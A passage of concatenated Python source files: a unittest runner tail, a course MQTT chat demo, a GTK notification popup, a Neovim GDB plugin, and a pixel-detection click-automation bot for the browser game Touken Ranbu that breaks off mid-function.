if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
mqtt.py
|
"""
JADS 2020 Data-Driven Food Value Chain course
Introduction to Sensors
Minimal MQTT client demo - demonstrates ease of use.
Makes use of the open http://www.mqtt-dashboard.com/index.html
And yes, globals are evil ;)
"""
import threading
import paho.mqtt.client as mqtt
import os
def on_connect(client, userdata, flags, rc):
global topic
global publisher_name
print("Welcome " + publisher_name + ", you're connected to " + topic + "\n")
print("Type 'q' to exit the chat.\n")
client.subscribe(topic)
def on_message(client, userdata, msg):
    global publisher_name
    incoming_message = msg.payload.decode()
    # Messages are published as "<sender>,<text>", so split on the first comma only.
    split_msg = [x.strip() for x in incoming_message.split(',', 1)]
    sender_name = split_msg[0]
    if sender_name != publisher_name and len(split_msg) > 1:
        print(sender_name + ":" + split_msg[1])
def publish():
    global publisher_name
    global topic
    # Loop instead of recursing, so a long chat session cannot hit Python's recursion limit.
    while True:
        new_msg = input()
        if new_msg in ("quit", "q", "exit", "quit()"):
            os._exit(1)
        client.publish(topic, publisher_name + "," + new_msg)
def receive():
client.on_connect = on_connect
client.on_message = on_message
client.loop_forever()
def config():
global publisher_name
global topic
while True:
publisher_name = input("Enter your username: ")
if publisher_name.isalpha():
break
print("Please enter characters A-Z only")
return "Loading chat (" + topic + ")..."
topic = "jads/intro-to-sensors"
print(config())
client = mqtt.Client()
client.connect("broker.hivemq.com", 1883, 60)
publish_thread = threading.Thread(target=publish)
receive_thread = threading.Thread(target=receive)
publish_thread.start()
receive_thread.start()
|
dialog.py
|
import threading
from time import sleep
import sys
import gi
gi.require_version('Gtk','3.0')
from gi.repository import Gtk
#Author : Reebal Javed Khan
# used to display some text/info passed as second argument to python executable
# example
# python dialog.py hello
# will display hello in a window for 1 second (default)
# I use it along nmcli to display if wifi has been enabled or disabled on pressing key combination using xkeybinds
# as I use dwm I don't need to use window size or position
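# Example invocation (an assumption about typical use, not part of the original):
#   python dialog.py "Wi-Fi enabled"   <- quote multi-word text so it arrives as a single argument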
n = len(sys.argv)  # get number of arguments passed from the command line
arg1 = ""  # initializing an empty string
if n == 2:
    arg1 = sys.argv[1]  # if an extra argument is passed while running this program, use it as the label text
win = Gtk.Window() # create a gtk window
win.connect("destroy", Gtk.main_quit) # allow destruction of this window
labelx=Gtk.Label() # create label
labelx.set_text(arg1) # add arg1 as text to label
win.add(labelx) # add label to window
win.show_all() # show the window
def thread_function(seconds):
    # sleep for the requested number of seconds, then quit the Gtk main loop
    sleep(seconds)
    Gtk.main_quit()
## a background thread sleeps while the window is displayed (1 second by default),
## after that it quits the main loop so the window closes and the program exits
x = threading.Thread(target=thread_function, args=(1,))  # thread initialization; 1 = display time in seconds
x.start()  # start the thread and let it sleep for the given number of seconds
Gtk.main() # Start main Gtk
x.join()
|
__init__.py
|
# ============================================================================
# FILE: __init__.py
# AUTHOR: Philip Karlsson Gisslow <philipkarlsson at me.com>
# License: MIT license
# ============================================================================
import neovim
import time
import threading
from nvgdb.nvgdb import NvGdb
@neovim.plugin
class NvGdbWrapper(object):
def __init__(self, nvim):
self.nvim = nvim
self.ng = NvGdb(nvim)
def server_wrapper(self):
self.ng.serve()
@neovim.command("NvGdbStart", range='', nargs='*', sync=True)
def NvGdbStart(self, args, range):
t = threading.Thread(target=self.server_wrapper, daemon=True)
t.start()
@neovim.command("NvGdbToggleBreakpoint", range='', nargs='*', sync=True)
def NvGdbToggleBreakpoint(self, args, range):
# Get current line and file
currentLine = self.nvim.command_output('echo line(".")')
currentFile = self.nvim.command_output('echo expand("%:p")')
self.ng.toggle_breakpoint(currentFile, currentLine)
@neovim.command("NvGdbSingleStep", range='', nargs='*', sync=True)
def NvGdbSingleStep(self, args, range):
self.ng.single_step()
@neovim.command("NvGdbStepOver", range='', nargs='*', sync=True)
def NvGdbStepOver(self, args, range):
self.ng.step_over()
@neovim.command("NvGdbStop", range='', nargs='*', sync=True)
def NvGdbStop(self, args, range):
self.ng.stop()
@neovim.command("NvGdbResume", range='', nargs='*', sync=True)
def NvGdbResume(self, args, range):
self.ng.resume()
@neovim.command("NvGdbReset", range='', nargs='*', sync=True)
def NvGdbReset(self, args, range):
self.ng.reset()
@neovim.command("NvGdbRefreshBreakpoints", range='', nargs='*', sync=True)
def NvGdbRefreshBreakpoints(self, args, range):
self.ng.refresh_breakpoints()
@neovim.command("NvGdbEvalWord", range='', nargs='*', sync=True)
def NvGdbEvalWord(self, args, range):
self.ng.eval_word()
@neovim.command("NvGdbShowStackTrace", range='', nargs='*', sync=True)
def NvGdbShowStackTrace(self, args, range):
self.ng.show_stack_trace()
@neovim.command("NvGdbSelectStackFrame", range='', nargs='*', sync=True)
def NvGdbSelectStackFrame(self, args, range):
self.ng.select_stack_frame_from_stack_window()
@neovim.command("NvGdbShowLog", range='', nargs='*', sync=True)
def NvGdbShowLog(self, args, range):
""" Show the R2Nvim log
Parameters:
n/a
Returns:
n/a
"""
self.nvim.command('e NvGdb_log')
self.nvim.command('setlocal buftype=nofile')
self.nvim.command('setlocal filetype=NvGdb_log')
logStr = self.ng.get_log()
self.nvim.current.buffer.append(logStr)
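# Usage sketch (an assumption: the plugin is installed and :UpdateRemotePlugins has been run):
#   :NvGdbStart                 start the NvGdb server thread
#   :NvGdbToggleBreakpoint      toggle a breakpoint on the current line of the current file
#   :NvGdbShowLog               open the NvGdb log in a scratch buffer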
|
horikun.py
|
import win32gui, win32api, win32con
import time, random
import tkinter
import os, sys
import threading, inspect, ctypes
# Package as an exe with: pyinstaller -F -w horikun.py
# <editor-fold desc="horikun: basic UI and core features">
"""
Constant definitions
"""
TITLELIST = [": v1.1.8", ":最新版!(大概)", ": Hello World", ":持续更新中",
":扫地洗衣", ":偷袭暗杀", ":请问兼桑在这里吗?", "",
":自定义标题", ":兼桑————————", ":::", ":检非违使狩猎中",
"|ω・`)", ":( ˘ω˘`)", ":要不要剪个头发?", ": kanesan.love",
":( ^ ^`)", ":我来咏一句吧?梅(以下略)", ":这力量是铁 这力量是钢",
":兼桑兼桑兼桑", ":传说中的胁差", ":例行搜查", ":兄弟的筋肉",
":邪道", ":也不要忘了兄弟们哦", " : nuk-iroh", ":内置kanesan",
":内置兄弟", ": 欢迎来github提意见哦", ": also try KanColle-Auto!"]
# Messages printed every 5 minutes
MIN_CHAT = ["又是5分钟。", "嗯,5分钟过去了。还要继续呢!",
"就以5分钟为一步,慢慢走下去吧!",
"可能5分钟也算不了什么啦。", "每个5分钟都很重要哦!",
"按照5分钟-7分钟-5分钟来报时如何?", "休息5分钟似乎也不错!", "大概5分钟过去了呢。"]
# Occasionally mixed into the log output while a script is running
ON_CHAT = ["兼桑没有惹出什么问题就好……", "顺便一提,兼桑还精神吗?", "对了,兼桑没有偷懒吧?", "啊,兼桑似乎新咏了一句!",
"任务的安排也要适度,出现负伤者就不好了。", "就照这个劲头干下去吧!", "要洗的衣服堆起来了……",
"去二十四节气景趣休息一下如何?", "大广间景趣真是华丽呀……有点不习惯呢!", "接下来要去活动吗?",
"挖山……真是不容易呀!", "就用邪道的方式走下去吧!", "今天的演练有参加吗?", "今天也要找检非吗?",
"要不要去函馆转换下心情?", "兼桑……嘿嘿。"]
# Chatter shown when choosing a map
BATTLE_CHAT = [["是老地方呢,……走吧,去那个战场。", "这个地方……真是怀念呢!", "收集立绘吗?不要太过火哦。", "这里,资源并没有很多呢。"],
["Boss点,这次要不要去呢……", "要小心敌太刀哦。", "要小心敌大太刀哦。", "回收依赖札就交给我吧!"],
["是关原呢,亲眼看到那场战役!", "玉钢和依赖札,一定带回来!", "木炭和玉钢,捡哪个好些呢?", "织田大人的安土,有缘的刀很多呢!"],
["就去捡些依赖札吧!", "是要回收砥石吗?", "了解。是要去收集什么资源呢?", "是冷却材?还是三日月大人呢?"],
["为了小乌丸大人,一起加油吧!", "虽然木炭很多,但是敌远程……", "不要午,不要午……", "厚樫山……没什么能说的了呢。"],
["京都的市中,努力不要迷路吧!", "在三条大桥上开辟出道路吧!", "好啦……公务搜查!", "一定要……守护那些人们的历史!"],
["希望能不要迷路直驱Boss点呢。", "能无伤突破就好了!", "但愿能尽可能减轻损伤……", "编成合适,这里会成为最简单的地图呢!"],
["就用远程来攻克这里吧!", "是要提高练度吗?要小心负伤哦!", "", ""]]
# Special messages shown when the script ends.
# Starting from 1, which set is used depends on how many 5-minute log entries were printed; the count caps at 50.
min_count = 0
END_CHAT_0 = ["下一个!", "接下来要做什么呢?", "继续下一环节吧!"]
END_CHAT_1 = ["主人也稍作整顿如何?", "稍做整顿,为下个任务打起精神!"]
END_CHAT_2 = ["大家辛苦了!", "长时间出勤辛苦了!"]
DIRECTORY = './kns/'
FOLD = '.py'
t1 = threading.Thread()
t2 = threading.Thread()
# ITSNAME = "计算器"
# ITSNAME="ToukenBrowser"
# ITSNAME="刀剣乱舞-ONLINE- - DMM GAMES - Google Chrome"
ITSNAME = "ToukenBrowserChromeWindow"
hwnd = 0
hwndDCf = 0
on_run = False
"""
窗体定义
"""
root = tkinter.Tk()
root.title("hori-kun" + random.choice(TITLELIST))
root.geometry("800x600")
root.configure(bg='#2A3260')
root.resizable(width=False, height=False)
"""
模块2:log
"""
scrl2 = tkinter.Scrollbar(root)
scrl2.place(x=10, y=405, width=635, height=185)
text2 = tkinter.Text(root, bg='white', fg='dimgray', font=("等线", 14), yscrollcommand=scrl2.set)
text2.place(x=10, y=405, width=615, height=185)
def log(result):
text2.insert(tkinter.END,
# time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
time.strftime('%m-%d %H:%M:%S', time.localtime(time.time()))
+ " " + result + '\n')
text2.see(tkinter.END)
log("本程序不为使用脚本所造成的损失承担任何责任")
log("horikun 1.1.8 暂不支持在程序内编辑脚本")
scrl2['command'] = text2.yview
"""
模块1:选择子文件
"""
if not os.path.exists(DIRECTORY):
win32api.MessageBox(0, DIRECTORY + "目录缺失,请重新下载哦", "没有找到兼桑", win32con.MB_ICONWARNING)
sys.exit()
file_name = [os.path.splitext(name)[0] for name in os.listdir(DIRECTORY) if name.endswith(FOLD)]
scrl1 = tkinter.Scrollbar(root)
scrl1.place(x=10, y=10, width=185, height=385) #
list1 = tkinter.Listbox(root, bg='deepskyblue', fg='black', font=("等线", 16), selectmode=tkinter.BROWSE,
yscrollcommand=scrl1.set)
list1.place(x=10, y=10, width=165, height=385)
for item in file_name:
list1.insert(tkinter.END, item)
scrl1['command'] = list1.yview
def indexstr():
indexs = list1.curselection()
if len(indexs) == 0:
index = 0
else:
index = int(indexs[0])
return DIRECTORY + file_name[index] + FOLD
"""
核心功能
"""
def gethwnd():
global hwnd
global hwndDCf
win32gui.ReleaseDC(hwnd, hwndDCf)
hwnd = win32gui.FindWindow(None, ITSNAME)
while hwnd == 0:
log("等待获取%s窗口 ..." % ITSNAME)
time.sleep(3)
hwnd = win32gui.FindWindow(None, ITSNAME)
hwndDCf = win32gui.GetWindowDC(hwnd)
log("已获取窗口,句柄为%d" % hwnd)
# left, top, right, bottom = win32gui.GetWindowRect(hwnd)
def make_position(cx, cy):
    # pack the target client coordinates into the lParam expected by the mouse messages
    return win32api.MAKELONG(cx, cy)
def click_down(cx, cy):
    win32api.SendMessage(hwnd, win32con.WM_LBUTTONDOWN, win32con.MK_LBUTTON, make_position(cx, cy))  # simulate mouse button down
def click_up(cx, cy):
    win32api.SendMessage(hwnd, win32con.WM_LBUTTONUP, win32con.MK_LBUTTON, make_position(cx, cy))  # simulate mouse button up
    time.sleep(1e-2)
def click(cx, cy):
click_down(cx, cy)
click_up(cx, cy)
def wait(t):
time.sleep(t / 1000)
# win32gui.SetForegroundWindow(hwnd)  # this line would pull the window to the front
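# Because clicks are delivered with SendMessage/WM_LBUTTONDOWN directly to the window handle,
# the game window does not need to be in the foreground; the coordinates are client coordinates
# packed into lParam via MAKELONG above (though some windows ignore synthesized messages).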
def get_rgb(x, y):
rgba = win32gui.GetPixel(hwndDCf, x, y)
r = rgba & 255
g = (rgba >> 8) & 255
b = (rgba >> 16) & 255
# rgb = str(r) + ',' + str(g) + ',' + str(b)
rgb = [r, g, b]
return rgb
def check_rgb(x, y, rgb2):
rgb1 = get_rgb(x, y)
if_rgb = True
for i in range(3):
if_rgb &= rgb1[i] == rgb2[i]
return if_rgb
def check_rgb_rough(x, y, rgb2, err):
rgb1 = get_rgb(x, y)
if_rgb = True
for i in range(3):
if_rgb &= rgb1[i] - err <= rgb2[i] <= rgb1[i] + err
return if_rgb
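# Example of the pixel helpers (a sketch; assumes gethwnd() has already grabbed the game window):
#   check_rgb(45, 47, [4, 124, 58])            matches only an exact RGB value
#   check_rgb_rough(45, 47, [4, 124, 58], 20)  tolerates +/-20 per channel, useful for anti-aliased art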
"""
模块3:显示子文件代码
"""
scrl3 = tkinter.Scrollbar(root)
scrl3.place(x=205, y=10, width=585, height=385)
def disp_text(e=None):
global on_run
if not on_run:
with open(indexstr(), 'r', encoding='utf-8') as f:
content = f.read()
text3.configure(state='normal')
text3.delete(0.0, tkinter.END)
text3.insert(tkinter.INSERT, content)
text3.configure(state='disabled')
list1.bind('<<ListboxSelect>>', disp_text)
text3 = tkinter.Text(root, bg='white', fg='dimgray', font=("等线", 14), yscrollcommand=scrl3.set)
text3.place(x=205, y=10, width=565, height=385)
text3.insert(tkinter.END, "Hello world!")
scrl3['command'] = text3.yview
disp_text()
"""
模块4:开始/停止按键
"""
def _async_raise(tid, exctype):
tid = ctypes.c_long(tid)
if not inspect.isclass(exctype):
exctype = type(exctype)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
def stop_thread(thread):
_async_raise(thread.ident, SystemExit)
def endscript(errmsg='None'):
global t1
global t2
global on_run
on_run = False
stop_thread(t2)
log("结束运行。" + choose_end_chat(min_count))
button4.configure(text="执行\n脚本")
if not errmsg == 'None':
        # add popups for new abnormal-termination cases here
if errmsg == 'gb':
win32api.MessageBox(0, "队内男士的特上刀装损坏了", "金蛋掉了!", win32con.MB_ICONWARNING)
elif errmsg.find('inj') >= 0:
if errmsg == 'inj0':
win32api.MessageBox(0, "出现重伤了", "负伤了!", win32con.MB_ICONWARNING)
elif errmsg == 'inj1':
win32api.MessageBox(0, "出现中伤以上伤员了", "负伤了!", win32con.MB_ICONWARNING)
else:
win32api.MessageBox(0, "出现轻伤以上伤员了", "负伤了!", win32con.MB_ICONWARNING)
elif errmsg == 'lim':
win32api.MessageBox(0, "出阵结束", "结束啦!", win32con.MB_ICONASTERISK)
else:
win32api.MessageBox(0, "未定义的结束情况", "怎么回事?", win32con.MB_ICONHAND)
disp_text()
stop_thread(t1)
def on_button():
global on_run
global min_count
global t1
global t2
if on_run:
endscript()
else:
on_run = True
t1 = threading.Thread(target=go_run)
t1.setDaemon(True)
t1.start()
t2 = threading.Thread(target=log_rep)
t2.setDaemon(True)
t2.start()
button4.configure(text="停止\n脚本")
log("开始运行。")
min_count = 0
def go_run():
global min_count
init_params()
gethwnd()
try:
exec(open(indexstr(), encoding='utf-8').read())
    except Exception:  # ArithmeticError, IOError, OSError, WindowsError and RuntimeError are all Exception subclasses
win32api.MessageBox(0, "脚本代码错误,请再编辑", "出错了!", win32con.MB_ICONWARNING)
root.destroy()
win32gui.ReleaseDC(hwnd, hwndDCf)
sys.exit()
endscript()
def log_rep():
while 1:
time.sleep(300)
if random.randint(0, 9) < 7:
log(MIN_CHAT[-1])
elif random.randint(0, 3):
log(random.choice(MIN_CHAT[0:-1]))
else:
log(random.choice(ON_CHAT))
global min_count
if min_count <= 50:
min_count += 1
def choose_end_chat(count):
if count == 0:
return ""
elif count < 10:
return random.choice(END_CHAT_0)
elif count < 40:
return random.choice(END_CHAT_1)
else:
return random.choice(END_CHAT_2)
button4 = tkinter.Button(root, bg='maroon', fg='white', activebackground='crimson',
font=("华文行楷", 40), text="执行\n脚本", command=on_button)
button4.place(x=655, y=405, width=135, height=185)
# </editor-fold>
# <editor-fold desc="kanesan: 用来给horikun提供支持的功能函数库">
# --------------------------- Common ---------------------------------------------
last_map = False  # whether the default map on the sortie screen is already fixed to last sortie's destination (no era selection needed)
"""
Revised equipment check logic.
Before sortieing, record which of the 18 equipment slots hold gold items and which hold silver.
During the sortie, the slot type is not re-checked; only the durability of those slots is inspected:
if the durability is still above the expected value (judged by one pixel at the 0 edge as the lower bound), keep fighting;
if the durability is too low, return home normally and start the next run;
if the durability drops to 0 (whenever durability is checked, a lost-equipment check is done as well), treat it as a lost-equipment error and abort the script.
"""
checked_balls = False  # whether the gold-equipment positions have been recorded once
battles = 0  # number of sorties completed so far
pos_balls = []  # what kind of equipment sits in each slot
def init_params():
"""
每次按红色按钮启动脚本时,对global变量进行初始化
"""
global last_map
global checked_balls
global battles
global pos_balls
    last_map = False
    checked_balls = False
    battles = 0
    pos_balls = []  # reset the list, otherwise restarting the script keeps appending and reads stale slots
    for i in range(6):
        pos_balls.append([0, 0, 0])
def d(x, y):
# 测试用
print(str(int(x / 2)) + ", " + str(int(y / 2)))
def f(x):
strrr = ''
for i in range(len(x)):
strrr += str(int(x[i] / 2)) + ', '
print(strrr[0:-2])
def if_in_home():
    # Are we currently on the home screen (honmaru)?
return (check_rgb(45, 47, [4, 124, 58]) and
check_rgb(69, 567, [234, 227, 175]) and
check_rgb(584, 43, [162, 27, 36]))
def if_in_battle_select():
    # Are we on the map-selection screen (could be a normal map or an event map)?
return (check_rgb(48, 192, [172, 20, 20]) and
check_rgb(273, 91, [238, 221, 187]) and
check_rgb(677, 103, [228, 224, 194]))
def if_in_group_select():
# 当前是否在选择部队界面
return (check_rgb(827, 124, [120, 214, 216]) and
check_rgb(28, 241, [98, 11, 11]) and
check_rgb(651, 160, [0, 53, 134]))
def if_in_formation_select():
    # Are we on the formation-selection screen?
return (check_rgb(175, 70, [198, 23, 23]) and
check_rgb(233, 213, [80, 179, 14]) and
check_rgb(549, 391, [192, 100, 54]))
def if_in_battle_count():
    # Are we on the post-battle results screen?
return (check_rgb(30, 95, [33, 200, 25]) and
check_rgb(553, 30, [126, 4, 8]) and
check_rgb(64, 143, [65, 7, 17]))
def if_in_next_point():
    # Are we on the screen where we can advance to the next node?
return (check_rgb(32, 136, [255, 255, 255]) and
check_rgb(51, 82, [36, 171, 22]) and
check_rgb(818, 473, [255, 255, 255]))
# -------------------------------------------------------------------------------------------------- needs rework -------------------------
def if_inj_gb(gb_life=0):
"""
在可以进军的界面,检查金蛋耐久度是否在允许值以下
参数:耐久占比到这个数以下时就要回城,0~1的浮点数,0为禁用。
保守值为0.25几乎不会再掉刀装,
也可以取0.15,降低掉远程刀装的概率
"""
if_injed_gb = False
if gb_life:
for j in range(3):
# gb_life为0时,该检查规则仍有效
check_x = int(gb_life_X_START[j] + gb_life * (gb_life_X_END[j] - gb_life_X_START[j]))
for i in range(6):
if pos_balls[i][j] and check_rgb(check_x, gb_life_Y[i], gb_life_RGB):
if_injed_gb = True
return if_injed_gb
def if_drop_gb():
    # On the advance screen, check whether gold equipment has been lost compared to when we sortied. This function is now a special case of the one above.
if_dropped_gb = False
gb_life=0
for j in range(3):
# gb_life为0时,该检查规则仍有效
check_x = int(gb_life_X_START[j] + gb_life * (gb_life_X_END[j] - gb_life_X_START[j]))
for i in range(6):
if pos_balls[i][j] and check_rgb(check_x, gb_life_Y[i], gb_life_RGB):
if_dropped_gb = True
return if_dropped_gb
def if_injure(injury=0):
"""
在可以进军的界面,检查是否有队员负伤
参数:
injury,0-仅重伤,1-中伤以上,2-轻伤以上
"""
if_injured = False
for i in range(6):
for j in range(injury + 1):
if_injured |= check_rgb_rough(MARCH_INJ_X, MARCH_INJ_Y[i], MARCH_INJ_RGB[j], MARCH_INJ_ERR)
return if_injured
def enter_battle_face():
"""
从本丸进入出阵远征演练界面(函数):
点击右上调出菜单
点击出阵按钮
等待,直到加载出出阵/远征/演练画面
"""
click(960, 34)
wait(500)
click(987, 122)
wait(800)
while not if_in_battle_face():
click(960, 34)
wait(500)
click(987, 122)
wait(800)
# Equipment slot positions checked right before sortieing
ENTER_GB_X = [301, 422, 541]
ENTER_GB_Y = [134, 204, 274, 343, 413, 483]
ENTER_GB_RGB_1 = [255, 215, 94]  # gold equipment
ENTER_GB_RGB_2 = [162, 170, 178]  # silver equipment
ENTER_GB_RGB_3 = [134, 187, 172]  # green equipment
ENTER_GB_ERR = 20
# Equipment durability checked right before advancing
gb_life_X_START = [385, 438, 490]
gb_life_X_END = [424, 476, 529]
gb_life_Y = [188, 256, 324, 392, 460, 528]
gb_life_RGB = [102, 54, 3]  # this area is not a texture, so no fuzzy ERR is needed
# Injury status checked right before advancing
MARCH_INJ_X = 208
MARCH_INJ_Y = [137, 205, 273, 341, 409, 477]
MARCH_INJ_RGB = [[239, 0, 0], [255, 119, 0], [239, 204, 0]]  # heavy, moderate, light
MARCH_INJ_ERR = 30  # 10 might already be enough?
def check_gb(check_balls):
"""
出门前检查带了多少刀装
"""
global pos_balls
# 切换两下,浏览刀装
while not check_rgb(326, 360,[244, 236, 188]):
click(152, 93)
wait(800)
# 记录各位置上是否有金蛋
str_gb = ""
for i in range(6):
str_gb += "\n队员" + str(i + 1) + ": ["
for j in range(3):
if check_rgb_rough(ENTER_GB_X[j], ENTER_GB_Y[i], ENTER_GB_RGB_1, ENTER_GB_ERR):
pos_balls[i][j] = 1
str_gb += " 金 "
elif check_rgb_rough(ENTER_GB_X[j], ENTER_GB_Y[i], ENTER_GB_RGB_2, ENTER_GB_ERR):
pos_balls[i][j] = 2
str_gb += " 银 "
elif check_rgb_rough(ENTER_GB_X[j], ENTER_GB_Y[i], ENTER_GB_RGB_3, ENTER_GB_ERR):
pos_balls[i][j] = 3
str_gb += " 绿 "
else:
str_gb += " 无 "
str_gb += "]"
log("正常刀装情况如下:" + str_gb)
    # Then, so that superfluous equipment is not checked later, filter the slots by the "equipment grades to check" setting.
for i in range(6):
for j in range(3):
if check_balls<pos_balls[i][j]:
pos_balls[i][j]=0
    # Finally, the non-zero entries left in pos_balls are the slots that still need checking.
def enter_battle_map(check_balls):
"""
决定出阵这个地图(函数):
点击右下选队按钮
等待部队加载
(跳过刀装/伤势确认)
记录出阵前有着金刀装的位置
点击右下出阵按钮
点击确认“队伍等级超过,是否还要出阵”
"""
global checked_balls
click(888, 537)
wait(500)
while not if_in_group_select():
wait(500)
wait(500)
click(151, 91)
wait(500)
if not checked_balls:
check_gb(check_balls)
checked_balls = True
click(899, 502) # 点击出阵
wait(1000)
click(408, 378) # 点掉超等级提示
wait(500)
def enter_battle_map_hanafubuki(change=False):
"""
刷花时的,决定出阵这个地图。
点击右下选队按钮
等待部队加载
卸刀装,换刀(重点)
点击右下出阵按钮
点击确认“队伍等级超过,是否还要出阵”
"""
click(888, 537)
wait(500)
while not if_in_group_select():
wait(500)
wait(500)
# 刷花脚本不检查金刀装。
if change:
# 进入队长的刀装界面
click(658, 145)
while not check_rgb(571, 31, [124, 81, 44]):
wait(500)
# 一键解除刀装
click(494, 548)
while not check_rgb(288, 195, [233, 227, 197]):
wait(500)
# 随便点外面哪个地方,退出刀装界面
click(865, 170)
wait(800)
# 换人
click(570, 152)
while not check_rgb(351, 99, [114, 111, 0]):
wait(500)
# 激活filter
click(176, 556)
wait(500)
# 选择“有刀装的”
click(244, 445)
wait(500)
# 应用filter
click(785, 451)
wait(800)
# 选择第一个
if check_rgb(436, 119, [136, 128, 31]):
endscript('lim')
else:
click(939, 141)
while not check_rgb(367, 102, [233, 222, 187]):
wait(500)
wait(500)
click(899, 502) # 点击出阵
wait(1000)
click(408, 378) # 点掉超等级提示
wait(500)
# Predefined pixel positions used to judge an advantaged/disadvantaged formation
FORMATIONS = [[178, 183],  # screen coordinates of each formation
              [428, 183],
              [676, 183],
              [178, 357],
              [428, 357],
              [676, 357]]
FORMATION_GOOD = [219, 2, 2]  # note: when formation k is advantaged, the enemy formation is k+1
FORMATION_BAD = [2, 119, 218]  # probably never needed
# formation indices 0~5
def manual_formation(form_blind, if_enemy=None, then_mine=None):
"""
手动选择阵型(函数:盲选的阵型,特殊情况的敌阵型、我阵型)
# 提供特殊情况下的手选
若优势阵型代表的是特殊情况
则选择特殊答案
若其余五个阵型中某一个阵型为优势
则选择那个优势的
其他(侦察失败)
则选择盲选的
"""
enemy = form_blind + 1
for i in range(6):
if check_rgb(FORMATIONS[i][0], FORMATIONS[i][1], FORMATION_GOOD):
enemy = i + 1
break
if enemy >= 6:
enemy -= 6
if enemy == if_enemy or enemy - 6 == if_enemy:
click(FORMATIONS[then_mine][0], FORMATIONS[then_mine][1])
else:
click(FORMATIONS[enemy - 1][0], FORMATIONS[enemy - 1][1])
# ------------------------- Normal sorties ---------------------------------------------
def if_in_battle_face():
    # Are we on the regular sortie/expedition/practice screen?
return (check_rgb(172, 96, [183, 227, 254]) and
check_rgb(425, 69, [61, 115, 210]) and
check_rgb(166, 546, [142, 186, 66]))
def if_in_battle_normal():
    # Given if_in_battle_select, are we on the normal-map screen?
return ((check_rgb(369, 126, [140, 0, 0]) or check_rgb(306, 128, [140, 0, 0])) and
check_rgb(996, 533, [0, 52, 134]) and
check_rgb(244, 276, [190, 0, 0]))
def if_in_KBC():
    # Have we run into a kebiishi (enforcer) encounter?
return (check_rgb(320, 109, [8, 254, 236]) and
check_rgb(329, 305, [24, 96, 102]) and
check_rgb(767, 107, [4, 44, 255]))
def enter_battle_select():
"""
从本丸进入普图界面(函数):
从本丸进入选择出阵界面(函数)
选择“出阵”
等待,直到加载出选图画面
如果跑到活动图去了,往前一级回到普图选图界面
"""
enter_battle_face()
click(546, 225)
wait(500)
while not if_in_battle_select():
wait(500)
if not if_in_battle_normal():
click(137, 93)
wait(500)
def which_map():
"""
在普图选图界面,判断现在选中的是哪个时代
每个图的判据都是独特的,顺序可根据需求重排
1: check_rgb(597, 510,[84,83,69])
2: check_rgb(525, 553,[0,0,0])
3: check_rgb(688, 534,[10,10,8])
4: check_rgb(482, 497,[104,101,85])
5: check_rgb(179, 568,[32,31,26])
6: check_rgb(780, 525,[0,0,0])
7: check_rgb(702, 500,[0,0,0])
8: check_rgb(544, 561,[0,0,0])
"""
if check_rgb(524, 569, [43, 40, 37]):
current_map = 5
elif check_rgb(558, 560, [0, 0, 0]):
current_map = 8
elif check_rgb(597, 508, [1, 1, 1]):
current_map = 1
elif check_rgb(135, 533, [84, 83, 74]):
current_map = 4
elif check_rgb(434, 509, [16, 15, 12]):
current_map = 3
elif check_rgb(526, 549, [2, 2, 2]):
current_map = 2
elif check_rgb(631, 545, [0, 0, 0]):
current_map = 7
else: # (780, 524 ,[0, 0, 0])
current_map = 6
log("当前光标所指时代为 " + str(current_map) + "图")
return current_map
# Click points for the four maps inside one era on the normal-map screen
MAP4 = [[673, 342], [905, 349], [663, 445], [880, 443]]
# Whether a map selection has already been left over from the previous sortie
def map_select(m, n, la_map=False):
"""
普图选地图(函数:要选择的那个图是m-n)
若还没定义上次的出阵先:
判断当前所在大战场是m图(进入判断战场部分)
若m不对
点击左右箭头对应次数,让m对上
(无等待)点击对应的n
"""
if not la_map:
delta_map = m - which_map()
if delta_map >= 0: # 目标图号>当前所指图号
for i in range(delta_map):
for j in range(30):
if check_rgb(705 + 10 * j, 215, [255, 255, 255]):
click(705 + 10 * j, 215)
break
wait(500)
else:
for i in range(-delta_map):
click(109, 217)
wait(500)
click(MAP4[n - 1][0], MAP4[n - 1][1])
wait(500)
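# Example: map_select(6, 1) moves the era cursor to 6 (clicking the arrows as needed) and then
# clicks map 6-1; passing la_map=True skips the era search when the selection is already remembered.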
def go_battle_simple(m, n, middle=None, injury=0, limit=0, check_balls=0, gb_life=0):
"""
从本丸或者战中的任何一个点开始,进入无脑loop的循环
参数:
m : 1~8 的整数,出阵的时代
n : 1~4 的整数,出阵的具体地图
middle : 形如[x,y,[r,g,b]]的数组, 当满足这个颜色条件的时候,说明该中途回城了
injure : 0-重,1-中,2-轻的整数,中止脚本所需伤势
limit : 最大出阵次数,刷花时设成3就行。
check_balls : 0为不管刀装,1为只判断金刀装耐久,2为金银都判断,3为金银绿。
gb_life : 0~1的浮点数,刀装的耐久度小于这个比率时就该回城了。如果check_balls为0,该参数设置无效。
"""
global last_map
global battles
if if_in_home():
# 在本丸内
if limit and battles >= limit:
endscript('lim') # 结束,并告知是因为到达出阵上限退出的
enter_battle_select()
map_select(m, n, last_map)
enter_battle_map(check_balls)
battles += 1
if not last_map:
log(BATTLE_CHAT[m - 1][n - 1])
last_map = True
else:
log("出阵 × " + str(battles))
elif if_in_next_point():
# 到了该进军的时候
if_mid = False
if middle:
if_mid = check_rgb(middle[0], middle[1], middle[2]) # 是否到该回城的预设点
if_dropped_gb = if_drop_gb()
if_injed_gb = if_inj_gb(gb_life)
if_injured = if_injure(injury)
if if_mid or if_injed_gb or if_dropped_gb or if_injured: # 到地方了,要回城了
click(932, 440)
wait(500)
click(415, 377)
# 中途点回城 属正常情况
# 刀装低耐久度回城 属正常情况
if if_dropped_gb: # 掉金蛋必退出
endscript('gb') # 结束后告知是因为掉蛋而退出的
elif if_injured: # 负伤要看程度
endscript('inj' + str(injury))
wait(500)
click(631, 449)
else:
click(631, 157) # 没啥事的时候点上面,憋点下边,要不然可能误触进军
wait(1000)
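# A sketch of what a sub-script in ./kns/ might look like (an assumption, not one of the bundled
# scripts; go_run() exec()s the selected file, so the helpers above are in scope):
#   while True:
#       go_battle_simple(6, 1, injury=1, check_balls=1, gb_life=0.25)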
def auto_hanafubuki(limit=3):
"""
全自动刷花。
基本结构如上,但有些许的modify。
"""
global last_map
global battles
auto_hanafubuki.change = False
if if_in_home():
# 在本丸内
if battles >= limit:
